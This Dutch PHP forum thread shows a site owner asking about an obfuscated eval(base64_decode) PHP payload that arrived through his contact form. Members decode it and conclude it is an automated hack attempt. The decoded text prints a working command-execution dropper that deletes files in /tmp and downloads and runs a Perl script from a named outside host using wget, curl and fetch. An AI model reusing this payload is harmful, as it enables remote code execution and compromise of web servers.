malware hack poging

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Software Ontwikkelaar

Functieomschrijving In deze uitdagende functie als Software Developer ga je de volgende taken uitvoeren: Maatwerk back-end software programmeren; API koppelingen bouwen; Software optimaliseren voor klanten; Bouwen maatwerk applicaties; Werken met Microsoft stack zoals C#, .NET (Core) en Entity framework; Bedrijfsprofiel Je gaat werken bij een klein softwareontwikkelingsbureau, die maatwerk software bouwt voor klanten door heel Nederland. Dit doen zij al meer dan 20 jaar. Het is van oorsprong een familiebedrijf, opgezet door de eigenaar, die er nog steeds werkt. Het team bestaat vooral uit back-end developers en één systeembeheerder. Je krijgt veel kans om jezelf te ontwikkelen en krijgt tevens

Bekijk vacature »

Front-end Developer

Functie omschrijving Wij zijn op zoek naar een Front-end Developer! Als Front-end Developer binnen dit softwarebedrijf ga je de frontends voor zowel je eigen interne projecten als die voor klanten opzetten, onderhouden en uitbreiden. Je zet ideeën om naar mooie successen voor de klanten. Dat is in een notendop wat je gaat doen! Wat kun je verwachten? Je werkt aan de doorontwikkeling van bestaande maatwerkapplicaties. Bijvoorbeeld wanneer de klant de applicatie wil uitbreiden met een nieuwe feature; Samen met het team van backenders en desginers zet je nieuwe ideeën van klanten om naar mooie oplossingen; Je werkt met verschillende frameworks.

Bekijk vacature »

C# Developer

Functie omschrijving Voor een softwarebedrijf in de omgeving van Veghel zijn we op zoek naar een C# developer. Word jij blij van ontwikkelen in C# en .NET? Lees dan snel verder! Jouw werkzaamheden zullen er als volgt uit gaan zien: Door middel van ASP.NET, MVC Framework en C# ga je webshops, websites en webapplicaties ontwikkelen. Je zorgt voor de optimalisatie van bestaande software en de automatisering van bedrijfsprocessen. Op basis van de wensen van de klant ga je samen met je collega's ga je op zoek naar de juiste oplossingen en je gaat dit uitwerken tot een mooi eindproduct. Bedrijfsprofiel

Bekijk vacature »

Medior PHP Developer

Bij Getnoticed doen wij wat we leuk vinden, websites bouwen en online marketing. Voor veel van onze klanten doen we dan ook allebei. Wel zo fijn om campagnes te draaien voor conversiegerichte website die in eigen beheer zijn. In onze vestiging in Nederweert zitten onze development afdelingen en worden de websites gebouwd. Op dit moment zijn we op zoek naar jou: dé PHP/Back-end developer die net als wij, het hoofd boven het maaiveld durft uit te steken! In het kort Even een paar punten die omschrijven wat deze toffe baan inhoudt: Het bedenken van nieuwe functionaliteiten Het verbeteren van het

Bekijk vacature »

Als Front-end developer bijdragen aan het onderwij

Functie Als front-end developer om je terecht in een team van goede en ervaren developers, en ga je werken aan de software die door miljoenen mensen gebruikt wordt. Je bent in staat om designs effectief te vertalen naar werkende feautures en hebt oog voor een goede UX van het product. Je staat voor clean code en goede documentatie. Je ziet toegevoegde waarde in het beoordelen van het werk van collega’s om zo samen te streven naar hoge kwaliteit software en code. Je dagelijkse werk bestaat uit het werken aan componenten in de Storybook. Het verbeteren en refactoren van de huidige

Bekijk vacature »

PHP developer

Functie omschrijving Voor een klein bedrijf in de buurt van Nieuwegein zijn wij per direct op zoek naar een talentvolle PHP developer. Er wordt veel ruimte geboden voor eigen initiateven, waardoor je een mooie stempel kan drukken op jouw eigen werkzaamheden (zowel operationeel als strategisch). Het bedrijf heeft middels externe programmeurs een multimedia platform ontwikkeld, maar willen geleidelijk de ontwikkeling naar binnen halen. Om die reden zoeken zij een communicatieve interne PHP developer die graag meebouwt aan het succesvolle product. Je gaat de volgende werkzaamheden verrichten: Platform beheren en programmeren (PHP, MySQL, JQuery, Javascript, XML & HTML); Communicatie en aansturing

Bekijk vacature »

Junior .NET developer

Functie Als junior .NET ontwikkelaar start jij in ons development team met twee andere .NET developers. Als team werken jullie in scrum en is er iedere ochtend om 11.00 een standup. Jij krijgt als junior .NET ontwikkelaar een inwerk traject dat echt specifiek wordt ingericht op basis van wat jij nodig hebt. Een van de grootste pluspunten bij ons is dat wij binnen ons bedrijf veel (technische) vrijheid geven en juist eigen initiatieven erg stimuleren. Jouw werkzaamheden gaan er bij ons als volgt uit zien: – Het ontwikkelen van nieuwe software samen met interne en eventueel externe ontwikkelaars; – Het

Bekijk vacature »

Ervaren Magento developer gezocht!

Functie Je komt te werken in een zelfsturend team waarin vertrouwen voorop staat en inbreng en ideeën worden gewaardeerd. Ook staat innovatie centraal. Ze bieden jou de mogelijkheid om jezelf door te ontwikkelen. Denk hierbij aan cursussen en een persoonlijk ontwikkelplan. Je komt terecht in het team van momenteel 4 (ervaren) collega’s en zal meewerken aan de doorontwikkeling en nieuwbouw van de Magento platformen van meerdere opdrachtgevers volgens Agile/Scrum. Denk hierbij aan nieuwe functionaliteiten, UX en koppelingen met verschillende back-end systemen. Als ervaren developer zul je hiernaast ook andere developers assisteren en waar nodig de leiding nemen in het project.

Bekijk vacature »

ERP Developer fleet managementsysteem

Wat ga je doen als ERP Developer fleet managementsysteem? Als ERP developer speel jij een belangrijke rol bij het doorvoeren van wijzigingen en verbeteringen binnen het fleet managementsysteem. Jouw expertise op het gebied van ERP systemen stelt jou in staat om de applicatie optimaal te laten functioneren en te blijven ontwikkelen. Als lid van het IT-team werk je nauw samen met andere developers en het business team om het fleet managementsysteem te integreren met andere systemen. Je bent verantwoordelijk voor het ontwikkelen van nieuwe functionaliteiten en het implementeren van verbeteringen op basis van de wensen en eisen van onze klanten.

Bekijk vacature »

Front-end Developer

Do you want to work with the latest technologies on the development of new systems and applications? Create elegant interfaces using VueJS for thousands of users? Get moving and strengthen Nederlandse Loterij as a Front-end Developer. Thanks to your efforts, our services are always presented in style. As a Front-end Developer you are responsible for website development and improving customer experience based on data analyze. In this way, you directly contribute to a happy, healthy and sporty Netherlands. As a Front-end Developer you score by: Writing elegant, testable components without side-effects to provide functionality to the users Website development, adding

Bekijk vacature »

Freelance JAVA / C# Developer

Functieomschrijving Ben je een ervaren freelancer of werk je in loondienst en ben je toe aan een nieuwe uitdaging? Lees dan snel verder want wie weet is dit een leuke vacature voor jou! Voor een opdrachtgever in omgeving Delft zijn wij op zoek naar ervaren JAVA of C# Developers die graag op projectbasis willen werken. Je komt terecht bij een informele developers club die mooie projecten uitvoeren voor grote klanten. Het fijne van deze werkgever is dat je zelf mag beslissen hoe je te werk wilt gaan. Wil je als freelancer werken dan is dat OK. Wil je de zekerheid

Bekijk vacature »

Laravel Developer

Functie omschrijving Voor een gave organisatie in de buurt van Den Bosch zoek ik een PHP developer. Het is van belang dat je kennis/ervaring hebt met het framework Laravel. Jij gaat in deze functie software applicaties ontwikkelen. Deze software projecten zijn heel divers, en deze organisatie maakt software, van A tot Z. Klanten kunnen in elke sector werkzaam zijn, van profit tot non-profit. Andere taken zijn onder andere: documentatie schrijven over applicaties/uitleg geven over software en applicaties/ klantcontact over bestaande applicaties/applicaties optimaliseren. Bedrijfsprofiel Deze organisatie zit in de regio van Den Bosch en is een klein bedrijf. Er werken circa

Bekijk vacature »

Applicatie ontwikkelaar

Functie omschrijving Zelfstandige applicatie ontwikkelaar gezocht voor familiair bedrijf in omgeving Rotterdam! Ben jij op zoek naar een nieuwe uitdaging en zoek jij een informele werkgever waar je zelfstandig kunt werken binnen een leuk IT team, lees dan snel verder want wie weet zijn wij op zoek naar jou! Binnen deze rol houdt jij je met het volgende bezig: Onderhouden en ontwikkelen van de IT systemen; Opzetten van Azure Cloud systemen, denk aan interfaces, hardware op de Cloud, webportalen of BI functies; Werken aan scripts binnen verschillende software applicaties, denk aan ERP en CAD; Ontwikkelen en implementeren van MS PowerApps

Bekijk vacature »

Front-end Developer

Dit ga je doen Het onderhouden, ontwikkelen en testen van front-end software van diverse klant- en medewerkersapplicaties; Het ontwikkelen van maatwerk front-end oplossingen in Vue.js en participeren in een scrumteam; Mede-verantwoordelijk voor het begeleiden en coachen van drie junior front-end developers; Verantwoordelijk voor code-reviews en het opstellen van de juiste documentatie zoals userstories en API ontwerp; Participeren in diverse projecten t.b.v. optimalisatie van diverse applicaties; Het opzetten van API koppelingen met externe applicaties. Hier ga je werken Betreffende organisatie is gevestigd in de regio van Swifterbant en is al ruim 20 jaar lang bedreven in het ontwikkelen en aanbieden van

Bekijk vacature »

Ventilatiesysteem Productontwikkelaar HBO WO Verwa

Samengevat: Zij bieden flexibele ventilatiematerialen, geluidsdempers, rookgasafvoer producten en industrieslangen. Ben jij een technisch productontwikkelaar? Heb jij ervaring met het ontwikkelen van nieuwe producten? Vaste baan: Technisch Productontwikkelaar HBO WO €3.000 - €4.000 Zij bieden een variëteit aan flexibele ventilatiematerialen, geluiddempers, rookgasafvoer producten, industrieslangen en ventilatieslangen voor de scheepsbouw. Met slimme en innovatieve materialen zorgen wij voor een gezonde en frisse leefomgeving. Deze werkgever is een organisatie die volop in ontwikkeling is met hardwerkende collega's. Dit geeft goede ontwikkelingsmogelijkheden. De branche van dit bedrijf is Techniek en Engineering. Functie: Voor de vacature als Technisch Productontwikkelaar Ede Gld HBO WO ga

Bekijk vacature »
- Roland -

- Roland -

08/06/2014 11:19:32
Quote Anchor link
Nb. ik heb eval hier even vervangen door XXXX

Ik zie dit via een contact formulier binnenkomen:
Zou dit zo kunnen werken ?
[.php] is toch niet geldig (als alternative < ? p h p )

( . punt door mij toegevoegd )
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
[php]XXXX(base64_decode('ZWNobyAic2V4Y3JpbWUiOw==
ZWNobyUyMCUyMnYwcENyM3clM0NiciUzRSUyMiUzQiUwQWVjaG8lMjAlMjJzeXMlM0ElMjIucGhwX3VuYW1lJTI4JTI5LiUyMiUzQ2JyJTNFJTIyJTNCJTBBJTI0Y21kJTNEJTIyZWNobyUyMG5vYjBkeUNyM3clM0JjZCUyMC90bXAlM0JybSUyMC1yZiUyMGRvci4qJTIwKi50eHQuKiUzQmZldGNoJTIwaHR0cCUzQS8vd3d3LmxhLWJhdW1lLWRob3N0dW4uZnIvcGx1Z2lucy91c2VyL3Byb2ZpbGUvcHJvZmlsZXMvbG9nLnR4dCUzQnBlcmwlMjBsb2cudHh0JTNCcm0lMjAtcmYlMjBsb2cudHh0JTNCd2dldCUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQnJtJTIwLXJmJTIwbG9nLnR4dCUzQmN1cmwlMjAtTyUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQnJtJTIwLXJmJTIwbG9nLnR4dCUzQmx3cC1kb3dubG9hZCUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQmNkJTIwL3Zhci90bXAlM0JybSUyMC1yZiUyMGRvci4qJTIwKi5qcGcuKiUzQmZldGNoJTIwaHR0cCUzQS8vd3d3LmxhLWJhdW1lLWRob3N0dW4uZnIvcGx1Z2lucy91c2VyL3Byb2ZpbGUvcHJvZmlsZXMvbG9nLnR4dCUzQnBlcmwlMjBsb2cudHh0JTNCcm0lMjAtcmYlMjBsb2cudHh0JTNCd2dldCUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQnJtJTIwLXJmJTIwbG9nLnR4dCUzQmN1cmwlMjAtTyUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQnJtJTIwLXJmJTIwbG9nLnR4dCUzQmx3cC1kb3dubG9hZCUyMGh0dHAlM0EvL3d3dy5sYS1iYXVtZS1kaG9zdHVuLmZyL3BsdWdpbnMvdXNlci9wcm9maWxlL3Byb2ZpbGVzL2xvZy50eHQlM0JwZXJsJTIwbG9nLnR4dCUzQiUyMiUzQiUwQSUyNGVzZWd1aWNtZCUzRGV4JTI4JTI0Y21kJTI5JTNCZWNobyUyMCUyNGVzZWd1aWNtZCUzQiUwQWZ1bmN0aW9uJTIwZXglMjglMjRjZmUlMjklN0IlMEElMjRyZXMlMjAlM0QlMjAlMjclMjclM0IlMEFpZiUyMCUyOCUyMWVtcHR5JTI4JTI0Y2ZlJTI5JTI5JTdCJTBBaWYlMjhmdW5jdGlvbl9leGlzdHMlMjglMjdleGVjJTI3JTI5JTI5JTdCJTBBQGV4ZWMlMjglMjRjZmUlMkMlMjRyZXMlMjklM0IlMEElMjRyZXMlMjAlM0QlMjBqb2luJTI4JTIyJTVDbiUyMiUyQyUyNHJlcyUyOSUzQiUwQSU3RCUwQWVsc2VpZiUyOGZ1bmN0aW9uX2V4aXN0cyUyOCUyN3NoZWxsX2V4ZWMlMjclMjklMjklN0IlMEElMjRyZXMlMjAlM0QlMjBAc2hlbGxfZXhlYyUyOCUyNGNmZSUyOSUzQiUwQSU3RCUwQWVsc2VpZiUyOGZ1bmN0aW9uX2V4aXN0cyUyOCUyN3N5c3RlbSUyNyUyOSUyOSU3QiUwQUBvYl9zdGFydCUyOCUyOSUzQiUwQUBzeXN0ZW0lMjglMjRjZmUlMjklM0IlMEElMjRyZXMlMjAlM0QlMjBAb2JfZ2V0X2NvbnRlbnRzJTI4JTI5JTNCJTBBQG9iX2VuZF9jbGVhbiUyOCUyOSUzQiUwQSU3RCUwQWVsc2VpZiUyOGZ1bmN0aW9uX2V4aXN0cyUyOCUyN3Bhc3N0aHJ1JTI3JTI5JTI5JTdCJTBBQG9iX3N0YXJ0JTI4JTI5JTNCJTBBQHBhc3N0aHJ1JTI4JTI0Y2ZlJTI5JTNCJTBBJTI0cmVzJTIwJTNEJTIwQG9iX2dldF9jb250ZW50cyUyOCUyOSUzQiUwQUBvYl9lbmRfY2xlYW4lMjglMjklM0IlMEElN0QlMEFlbHNlaWYlMjhmdW5jdGlvbl9leGlzdHMlMjglMjdwb3BlbiUyNyUyOSUyOSU3QiUwQSUyNGYlMjAlM0QlMjBAcG9wZW4lMjglMjRjZmUlMkMlMjJyJTIyJTI5JTNCJTBBd2hpbGUlMjglMjFAZmVvZiUyOCUyNGNmZSUyOSUyOSUyMCU3QiUyMCUyNHJlcyUyMC4lM0QlMjBAZnJlYWQlMjglMjRjZmUlMkMxMDI0JTI5JTNCJTIwJTdEJTBBQHBjbG9zZSUyOCUyNGYlMjklM0IlMEElN0QlN0QlMEFyZXR1cm4lMjAlMjRyZXMlM0IlMEElN0Q='));die();[/php]


Gewijzigd op 08/06/2014 11:26:02 door - Roland -
 
PHP hulp

PHP hulp

29/04/2024 13:24:08
 
- Ariën  -
Beheerder

- Ariën -

08/06/2014 13:37:29
Quote Anchor link
Ik vermoed dat dit een hack is voor een bepaald 3rd-party webapplicatie?
Krijg je dit in een mail binnen?
 
- Roland -

- Roland -

08/06/2014 14:22:43
Quote Anchor link
ja, ik laat de inhoud van het contact formulier aan mezelf mailen.


"een bepaald 3rd-party webapplicatie?" ??? heb ik op deze site niet (gewoon een eigen siteje)
 
Peter  Flos

Peter Flos

08/06/2014 15:42:36
Quote Anchor link
Ik heb deze voor je gedecodeerd:

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
echo%20%22v0pCr3w%3Cbr%3E%22%3B%0Aecho%20%22sys%3A%22.php_uname%28%29.%22%3Cbr%3E%22%3B%0A%24cmd%3D%22echo%20nob0dyCr3w%3Bcd%20/tmp%3Brm%20-rf%20dor.*%20*.txt.*%3Bfetch%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Brm%20-rf%20log.txt%3Bwget%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Brm%20-rf%20log.txt%3Bcurl%20-O%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Brm%20-rf%20log.txt%3Blwp-download%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Bcd%20/var/tmp%3Brm%20-rf%20dor.*%20*.jpg.*%3Bfetch%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Brm%20-rf%20log.txt%3Bwget%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Brm%20-rf%20log.txt%3Bcurl%20-O%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3Brm%20-rf%20log.txt%3Blwp-download%20http%3A//www.la-baume-dhostun.fr/plugins/user/profile/profiles/log.txt%3Bperl%20log.txt%3B%22%3B%0A%24eseguicmd%3Dex%28%24cmd%29%3Becho%20%24eseguicmd%3B%0Afunction%20ex%28%24cfe%29%7B%0A%24res%20%3D%20%27%27%3B%0Aif%20%28%21empty%28%24cfe%29%29%7B%0Aif%28function_exists%28%27exec%27%29%29%7B%0A@exec%28%24cfe%2C%24res%29%3B%0A%24res%20%3D%20join%28%22%5Cn%22%2C%24res%29%3B%0A%7D%0Aelseif%28function_exists%28%27shell_exec%27%29%29%7B%0A%24res%20%3D%20@shell_exec%28%24cfe%29%3B%0A%7D%0Aelseif%28function_exists%28%27system%27%29%29%7B%0A@ob_start%28%29%3B%0A@system%28%24cfe%29%3B%0A%24res%20%3D%20@ob_get_contents%28%29%3B%0A@ob_end_clean%28%29%3B%0A%7D%0Aelseif%28function_exists%28%27passthru%27%29%29%7B%0A@ob_start%28%29%3B%0A@passthru%28%24cfe%29%3B%0A%24res%20%3D%20@ob_get_contents%28%29%3B%0A@ob_end_clean%28%29%3B%0A%7D%0Aelseif%28function_exists%28%27popen%27%29%29%7B%0A%24f%20%3D%20@popen%28%24cfe%2C%22r%22%29%3B%0Awhile%28%21@feof%28%24cfe%29%29%20%7B%20%24res%20.%3D%20@fread%28%24cfe%2C1024%29%3B%20%7D%0A@pclose%28%24f%29%3B%0A%7D%7D%0Areturn%20%24res%3B%0A%7D


Dat is wat eruit komt. Lijkt inderdaad op een hack, het is in ieder geval een stuk script.

Edit: Ik heb er een link uit gevolgeld:

-Verwijderd-

Deze link leid naar een DDos-Script toe. Ik neem aan dat je je emails vanuit je server zelf, of door je host veilig verstuurt?
Gewijzigd op 08/06/2014 17:49:58 door Peter Flos
 
Obelix Idefix

Obelix Idefix

08/06/2014 16:37:24
Quote Anchor link
Misschien handig/verstandig om die link dan niet als hyperlink op te nemen, als het naar een ddos-script leidt....
 
Peter  Flos

Peter Flos

08/06/2014 17:50:31
Quote Anchor link
Bij deze weggehaald, het ging mij er enkel om om te laten zien dat het dus een ddos poging is geweest.
 
- Ariën  -
Beheerder

- Ariën -

08/06/2014 19:01:06
Quote Anchor link
- Roland - op 08/06/2014 14:22:43:
ja, ik laat de inhoud van het contact formulier aan mezelf mailen.


"een bepaald 3rd-party webapplicatie?" ??? heb ik op deze site niet (gewoon een eigen siteje)

Dan is er niks aan de hand, lijkt me.
 
Christian k

christian k

08/06/2014 20:32:10
Quote Anchor link
als je dit binnen krijgt zonder dat je het zelf geprogrammeerd hebt,
is er wel wat aan de hand lijkt mij?
of zit ik nu fout?
ik zie namelijk niet in hoe een script dit kan versturen zonder dat jij die functie
er in hebt gebouwt?
 
- Ariën  -
Beheerder

- Ariën -

08/06/2014 21:15:25
Quote Anchor link
Een botje die denkt dat je een lek 3rd party script gebruikt?
 



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.